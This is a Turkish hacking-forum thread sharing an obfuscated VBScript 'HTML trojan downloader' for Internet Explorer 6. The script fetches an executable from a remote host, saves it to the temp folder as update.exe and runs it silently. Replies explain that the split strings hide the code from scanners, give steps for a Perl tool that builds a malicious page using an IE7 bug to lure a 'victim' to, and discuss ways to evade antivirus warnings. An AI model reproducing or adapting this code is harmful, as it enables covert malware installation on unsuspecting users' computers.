Forum
Aktif konular
Üyeler
Kurallar
Arama
Html Trojan Dowloader Html Trojan Dowloader
-
Websitesinden trojen bulaştırma Yanlızca bu kod İnternet Expoler 6 da ve güncellenmemiş Windowslara sahip makinalarda Çalışır.
<HTML>
<BODY>
<script language="VBScript">
on error resume next
dl = "www.site.com/trojan.exe"
Set df = document.createElement("object")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
df.setAttribute "classid",clsfull
strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&strr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5&ab6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="update.exe"
scripp1="Scrip"
scripp2="ting"
scripp3=".Fil"
scripp4="eSyste"
scripp5="mObject"
scripp=scripp1&scripp2&scripp3&scripp4&scripp5
set FF = df.createobject(scripp,"")
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1)
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("Shell.Application","")
MM.ShellExecute fnamezz1,"","","open",0
</script>
</BODY>
</HTML> -
nod32 kaptı hemen :)
-
googlede bazı sitelere girerken bu içerik bilgisayarınıza zarar verebilir vs. demesinin sebebi bu kodlarmıdır bu kod aynı işlevi görürmü ?
-
Evet normaldir bende kapıyor iptal edersen bir sorun cıkmaz.
-
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5&ab6
kodları niye böyle yazmıslarki :S -
Aşağıdaki downLoad Linkinden indirdiğiniz dosyanın içindeki dev.txt dosyasını açıp farkLı kaydetten dev.pl oLarak kaydediyoruz ve dosyayı C / Perl / bin kLasörüne kopyaLayoruz.
Sonra BaşLat / ÇaLıştır / cmd yazıp enterLıyoruz. Kod satırına sırasıyLa:
Kod:
cd..
cd..
cd Perl
cd bin
perl dev.pl -d http://www.siteniz.com/server.exe
bunLarı yazıyoruz entere basıyoruz.Sonra C / Perl / binklasöründe DevPoint.html adında bir htmL dosyası oLuşacaktır. O dosyayıda hostumuza atıp tek şey kurbanımıza o DevPoint.html dosyasının buLunduğu Linki yedirmek kaLıyor.
http://rapidshare.com/files/87167811/dev.txt.htmlbuda internet explorer 7 de ki bir bug deneyin belki olur
-
BuZuL bunu yazdı:
-----------------------------
googlede bazı sitelere girerken bu içerik bilgisayarınıza zarar verebilir vs. demesinin sebebi bu kodlarmıdır bu kod aynı işlevi görürmü ?
-----------------------------Buzul bu kodlar zarer vermez ama dl = www.site.com/trojan.exe Buradaki upload ettin keylogger trojen vs.. zarar verir sen hangi amacta kullanmak istediğine bağlı..
sadece explorer 6 calışıyor.. 7 için kodlar milwormda olacak
-
Fthrkl bunu yazdı:
-----------------------------
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5&ab6
kodları niye böyle yazmıslarki :S
-----------------------------sankı dalga geçiyo :D
-
Şifrelemişler kodları, kaynağa bakınca şap diye anlaşılmasın diye.
-
fivestar
Senin verdiğin 7 calışır sp1 2 3 vss onlarda işlermi bilemem..
Html den anlayan arkadaşlar kodlarda değişlik yapıp geliştire bilirlerse dağa sağlam olur örneğin nod32 hemen uyarı veriyor bu uyarıyı engelleme gibi şansları ola bilir..
-
SpoofU bunu yazdı:
-----------------------------
Şifrelemişler kodları, kaynağa bakınca şap diye anlaşılmasın diye.
-----------------------------html kodları decode etmek için
http://scriptasylum.com/tutorials/encdec/encode-decode.html bu siteden yararlana bilirsiniz..
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla